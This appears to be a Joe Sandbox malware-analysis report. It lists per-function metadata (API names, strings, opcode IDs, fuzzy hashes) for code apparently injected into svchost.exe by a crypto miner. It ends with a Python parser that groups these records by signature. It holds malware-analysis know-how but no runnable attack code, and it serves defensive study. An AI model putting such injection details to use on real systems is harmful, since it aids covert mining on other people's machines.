                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 4129ac803274aa25b024b198ef83d0f7a517cdb801d32a117a9186af29447f03
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 9D4171B7224B86C6E7A0CF61E4543EE77A1F389B98F448129DE8907B58DF38C485CB01
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D087
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 43319ffa0c7ee914352e92ba5d38087bee9b4dd8faa5ceab62ab6c6d6a778b8b
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 4611D03872528341FB68A7755A713F923416B443F0FA84734ED3D066EADE78C442A303
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 96eb2be9ce1bb00abb2c46e894f9b4b09165b72cda165d31dba4d8d7e2e0f222
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: E981C37973064386FB50AB65A4713F96390A785780FD88535EE0847FAEEB78C845C723
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: ee09959155a2eac8c82d5250b8b01ccc16e451735121b4104c9fa91c9d301f77
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 42D18F7A215B8A81EB70DB15E4943EA7BA0F388B84F500126EECD47BA5DF3DC551CB01
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 7f80d1afa80db319671d8072da7637dd5eac392f218b8f1172c2418ba6a9fafe
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 43319C3A721B53C2EB54CF66A5647FAA7A0FB44B84F888030DE4847B65EF38C4A5C701
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 5c996072e7495a570841e87374aa50147b4650859bf0fccf7ad7f1c2ba7911ee
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: D4018CB1320A8382EB90DB52A8687E963A1F788FC1F884035DE4D43B65DF3CC989C701
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 7e45d6de1701cbc48d00c2f5e89c2684de88328f7a74c5b911fd512dc97d2502
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: 74012DB9321B4382EF659B62E8283FA73A0BB55B86F940538CD4907764EF3DC108C702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 87c6860d37f0f3b42e4d04458acec92380321f76e05e6566a8e7a1b9f8bd8476
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 2351BEBA7216038BEB54DF15E468BF93796F348BA8FA18134DE0647788EB75C841C702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 17ddcd350c3fbab4c69cdfef475f0483a489c2ef7412cbcd3883b63ab174adac
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 5A31E07A32064387EB10DF11E8687E937A8F344BD8F958124EE4607799DB39C941C706
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 1b3ecc0efa6a92ca3f3c221fe06cef17b10792bda2791879ca196cc9822a9c58
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 14F01CB4728B8782EB548B53B9241F96761AB48FD0F889131EE4A47B68DF3CC449C702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 771891675fd56f81d4029b47b866c1a450b575f78d7e4331bfb30d922d75a8a2
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 1DF06DB5221B0781FB508B68E8643F96320FB89BA5FD44239DE6A462F4CF3CC188C311
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: a2ce81cf2cdac8cd3529f73802a6a72a0eb116d24f0474fd80187788a1aaa17d
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: BA02DD36229B8686E760CB55F4943AEBBA0F3C4784F504125EB8E47BA9DF7DC484CB01
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 24dc54690249d3895b1b7c38b4582e1f8e2edf1faac8764183dfcb93513ee1e5
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: 1561CD3A629B87C6F760CB15E4643AA7BA4F388784F900125EE8D47BA8DB7DC450CF01
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: c7ddc661428dab41173e4d3144494a3fabc548170c45f95645eedb0a9107dcdf
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: EE119EF2B70A5321F76565A8E8723F933446B683B8FD90634ED76266F68B38D8414202
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 302e9147bf9768ba2ee2bef3a396fc63e43c9e22c51b2e116c3aec92e75da88d
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 32519E7A1213838AEB648F2595A43FD77A0F354B88F944126EE9947BD5CB38D490C70A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: d9d41c282d7b2ce4aabfec58e688f1acd234d9b95e1d190f9a901a1bb8711e21
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 9AD102B2B24A8289E711CFB9D4503EC3BB1F355798F904226CE5E97BAADA34C507C341
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: d184098e54eec87762a1176ca5ed68c29c5bc5f7beb0174887d068f72f7a5b95
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: BB0148B6620A93D6E784EF66E9182EA77A0F788F81F444435EE4A4372ADF38C451C741
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
• Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
• Instruction ID: 17a65dbcd4a12060c852e93996711d64427f50b652a06d50e707f5cc3a2a7ab4
• Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
• Instruction Fuzzy Hash: 7A9104B2B2465389FB60DF6594A03FD3BE0F715B88F944129DE0A67AA5DB34C483C702

APIs
Memory Dump Source
• Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
• Instruction ID: 07055c1e54dafde211750482fff6b81622a8c3b3aaec0e8e3cdeaa1c6361cc99
• Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
• Instruction Fuzzy Hash: C3112E76720F4289EB40CF60E8643F833A4F759758F840E31DE6D46BA4DB78D1988381

APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
• Instruction ID: a4e0a277eb074df162ec384e4e3874137e7a14a5b34a9f4edaae454dd5bfc79b
• Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
• Instruction Fuzzy Hash: A171E33B220B8386E725DF26E8647FA6794F399B84FC40036DE0A57B89DE35C645C702

APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
• Instruction ID: 56eacd1cb70559ca7de4228d062e7ff752e37e0c1dc9b712038d02919abea6b6
• Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
• Instruction Fuzzy Hash: 7F51F33A22878381E774DE2AA4783FAA791F3C6784FD40135DE5903B9ADE39C545C742

APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
• Instruction ID: ccb3a4b7a4fba413b5e65f448ec0866b918ddff2e22582deebb6145b74459c80
• Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
• Instruction Fuzzy Hash: E241C272725A8282EB60CF25E8543FAB7A0F798794F904035EE4D877A8EB3CC542C741

APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
• Instruction ID: cb6d49408d700bcf134649fa86f529afd346d8d8b9871fd5f6248b902500e69f
• Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
• Instruction Fuzzy Hash: 7C113D36224B8282EB618F15F4503A977E5F788B94F984221EE8C07769EF3CC555CB00

APIs
Memory Dump Source
• Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction ID: 635b24736c22289d5cd47bd1db9a86048c3af2eb6c7f5d055bcc5ee3b73e71c1
• Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction Fuzzy Hash: EB116A79621B4685EB44DB66A8282F977A1FB89FD0F984038DE4D43766DF38C8829301
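The records above are the Joe Sandbox IDA plugin's per-function metadata for the code dumped out of the svchost.exe region the miner was injected into, and they are easier to mine programmatically than by eye. The parser below is an added example and is not part of the Joe Sandbox report or of xmrig: it reads the bullet fields into one dict per function, cross-checks the .sdmp name against the snapshot name (PID 69, stage 2 and base 0x1F2BD160000 appear in both, which is how the field positions were confirmed), and groups functions by their API String ID. The sample input is three records copied from the list above, trimmed to their bullet fields. Reading the fifth field of the .sdmp name as a Win32 page-protection value (0x40 = PAGE_EXECUTE_READWRITE) is an assumption about Joe Sandbox's naming scheme and should be confirmed against the report's memory-dump section; the PAGE_* constants themselves are the documented Win32 values.

```python
"""Parse Joe Sandbox IDA-plugin function records and group them by signature.

Added example; not code from the Joe Sandbox report or from xmrig.
"""
import re
from collections import defaultdict

# Constructed input: three records copied from the report, trimmed to bullet fields.
SAMPLE = r"""
Memory Dump Source
• Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
• Instruction Fuzzy Hash: C3112E76720F4289EB40CF60E8643F833A4F759758F840E31DE6D46BA4DB78D1988381
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
• Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
• Instruction Fuzzy Hash: A171E33B220B8386E725DF26E8647FA6794F399B84FC40036DE0A57B89DE35C645C702
Memory Dump Source
• Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
• Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
• Instruction Fuzzy Hash: 7F51F33A22878381E774DE2AA4783FAA791F3C6784FD40135DE5903B9ADE39C545C742
"""

FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*?)\s*$")
# <pid>.<stage>.<serial>.<base>.<fifth field>... ; fifth field as protection is an assumption
DUMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.")
SNAP_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(.+)\.jbxd$")

# Documented Win32 memory-protection constants (winnt.h).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}


def parse_records(text):
    """One dict per function; a new record starts at each 'Source File' bullet.
    Section labels without a value (APIs, Strings, Similarity, ...) are skipped."""
    records, cur = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2)
        if key == "Source File" or cur is None:
            cur = {}
            records.append(cur)
        cur[key] = value
    return records


def decode_dump_name(source_field):
    """Decode the .sdmp name in the 'Source File' field (text before the first comma)."""
    name = source_field.split(",")[0].strip()
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"unexpected dump name: {name}")
    pid_hex, stage_hex, _serial, base_hex, prot_hex = m.groups()
    prot = int(prot_hex, 16)
    return {"pid": int(pid_hex, 16), "stage": int(stage_hex, 16), "base": int(base_hex, 16),
            "protect": prot, "protect_name": PAGE_PROTECT.get(prot, f"0x{prot:x}")}


def decode_snapshot_name(snapshot_field):
    """Decode hcaresult_<pid>_<stage>_<base>_<image>.jbxd."""
    m = SNAP_RE.match(snapshot_field.strip())
    if not m:
        raise ValueError(f"unexpected snapshot name: {snapshot_field}")
    pid, stage, base_hex, image = m.groups()
    return {"pid": int(pid), "stage": int(stage), "base": int(base_hex, 16), "image": image}


def dump_matches_snapshot(record):
    """True when PID, stage and base address agree between the two file names."""
    d = decode_dump_name(record["Source File"])
    s = decode_snapshot_name(record["Snapshot File"])
    return (d["pid"], d["stage"], d["base"]) == (s["pid"], s["stage"], s["base"])


def group_by_signature(records):
    """API String ID is '<hash of API ID>-<hash of String ID>' (0 when no string);
    map each signature to the Opcode IDs of the functions that carry it."""
    groups = defaultdict(list)
    for r in records:
        groups[r["API String ID"]].append(r["Opcode ID"])
    return dict(groups)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        d = decode_dump_name(r["Source File"])
        print(f"pid={d['pid']} base=0x{d['base']:x} {d['protect_name']} "
              f"consistent={dump_matches_snapshot(r)} api={r['API ID']!r}")
    for sig, opcodes in group_by_signature(recs).items():
        print(sig, len(opcodes), "function(s)")
```

Two functions sharing an API String ID but carrying different Opcode IDs, as the two FileType / `\\.\pipe\` entries do here, import the same APIs and reference the same strings while differing in code; the Instruction Fuzzy Hash is the field to compare when trying to match such functions against a known clean xmrig build or against dumps from another run.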